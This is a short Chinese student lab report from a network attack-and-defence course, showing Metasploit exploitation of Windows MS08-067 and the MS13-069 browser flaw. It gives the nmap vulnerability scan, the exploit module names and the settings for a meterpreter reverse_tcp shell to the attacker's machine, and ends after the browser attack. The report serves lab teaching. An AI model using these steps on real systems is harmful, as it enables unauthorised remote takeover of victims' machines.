2018-2019-2 20165337《网络攻防技术》Exp5 MSF基础应用

一、实践目标

1.一个主动攻击实践

ms08_067

2.一个针对浏览器的攻击

ms13-069

3.一个针对客户端的攻击

adobe (Adobe_toolbutton客户端漏洞成功)

4.成功应用任何一个辅助模块

auxiliary/server/browser_autopwn

二、实验内容

主动攻击

首先输入nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址查看靶机是否存在该漏洞

然后在攻击机Kali的命令行中输入msfconsole进入控制台
输入use exploit/windows/smb/ms08_067_netapi使用这个漏洞
之后输入show options查看需要设置的参数

设置完靶机地址就可以完成
输入exploit进行攻击

针对浏览器的攻击

首先search ms13找到ms13-069

输入use exploit/windows/browser/ms13_069_caret
输入show options
查看需要设置的参数

设置参数:
srvhost 192.168.1.154
srvport 80
set payload windows/meterpreter/reverse_tcp
lhost 192.168.1.154
输入exploit进行攻击

攻击成功获取权限

猜你喜欢

转载自www.cnblogs.com/y963976867/p/10746603.html